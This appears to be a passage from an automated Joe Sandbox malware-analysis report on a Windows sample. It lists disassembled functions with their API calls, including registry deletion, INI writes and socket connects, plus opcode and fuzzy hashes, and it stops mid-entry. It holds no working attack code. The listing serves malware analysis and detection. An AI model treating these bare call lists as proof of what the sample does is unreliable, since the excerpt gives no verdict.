                                                      APIs
                                                      • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                      • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                      • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                      • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfile$SectionWrite$String
                                                      • String ID:
                                                      • API String ID: 2832842796-0
                                                      • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                      • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                      • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                      • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                      Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                      • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Enum$CloseDeleteOpen
                                                      • String ID:
                                                      • API String ID: 2095303065-0
                                                      • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                      • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                      • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                      • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                      Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 00436A24
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: RectWindow
                                                      • String ID:
                                                      • API String ID: 861336768-0
                                                      • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                      • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                      • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                      • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                      Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32 ref: 00449598
                                                        • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                      • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                      • _wcslen.LIBCMT ref: 0044960D
                                                      • _wcslen.LIBCMT ref: 0044961A
                                                      • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$_wcslen$_wcspbrk
                                                      • String ID:
                                                      • API String ID: 1856069659-0
                                                      • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                      • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                      • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                      • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                      Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 004478E2
                                                      • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                      • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                      • GetCursorPos.USER32(00000000), ref: 0044796A
                                                      • TrackPopupMenuEx.USER32(00A66340,00000000,00000000,?,?,00000000), ref: 00447991
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CursorMenuPopupTrack$Proc
                                                      • String ID:
                                                      • API String ID: 1300944170-0
                                                      • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                      • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                      • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                      • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                      Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetClientRect.USER32(?,?), ref: 004479CC
                                                      • GetCursorPos.USER32(?), ref: 004479D7
                                                      • ScreenToClient.USER32(?,?), ref: 004479F3
                                                      • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                      • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Client$CursorFromPointProcRectScreenWindow
                                                      • String ID:
                                                      • API String ID: 1822080540-0
                                                      • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                      • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                      • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                      • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                      Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                      • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                      • EndPaint.USER32(?,?), ref: 00447D13
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                      • String ID:
                                                      • API String ID: 659298297-0
                                                      • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                      • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                      • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                      • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                      Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                        • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                        • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                        • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                        • Part of subcall function 00440D98: SendMessageW.USER32(00A61BD8,000000F1,00000000,00000000), ref: 00440E6E
                                                        • Part of subcall function 00440D98: SendMessageW.USER32(00A61BD8,000000F1,00000001,00000000), ref: 00440E9A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Window$EnableMessageSend$LongShow
                                                      • String ID:
                                                      • API String ID: 142311417-0
                                                      • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                      • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                      • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                      • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                      Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                      • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                      • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                      • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                      Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 00445879
                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                      • _wcslen.LIBCMT ref: 004458FB
                                                      • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                      • String ID:
                                                      • API String ID: 3087257052-0
                                                      • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                      • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                      • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                      • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                      Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                      • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                      • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 245547762-0
                                                      • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                      • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                      • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                      • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                      Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 004471D8
                                                      • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                      • SelectObject.GDI32(?,00000000), ref: 00447228
                                                      • BeginPath.GDI32(?), ref: 0044723D
                                                      • SelectObject.GDI32(?,00000000), ref: 00447266
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Object$Select$BeginCreateDeletePath
                                                      • String ID:
                                                      • API String ID: 2338827641-0
                                                      • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                      • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                      • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                      • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                      Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNEL32(00000000), ref: 00434598
                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                      • Sleep.KERNEL32(00000000), ref: 004345D4
                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CounterPerformanceQuerySleep
                                                      • String ID:
                                                      • API String ID: 2875609808-0
                                                      • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                      • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                      • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                      • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                      Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                      • MessageBeep.USER32(00000000), ref: 00460C46
                                                      • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                      • EndDialog.USER32(?,00000001), ref: 00460C83
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                      • String ID:
                                                      • API String ID: 3741023627-0
                                                      • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                      • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                      • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                      • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                      Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                      Download Yara Rule
                                                      APIs
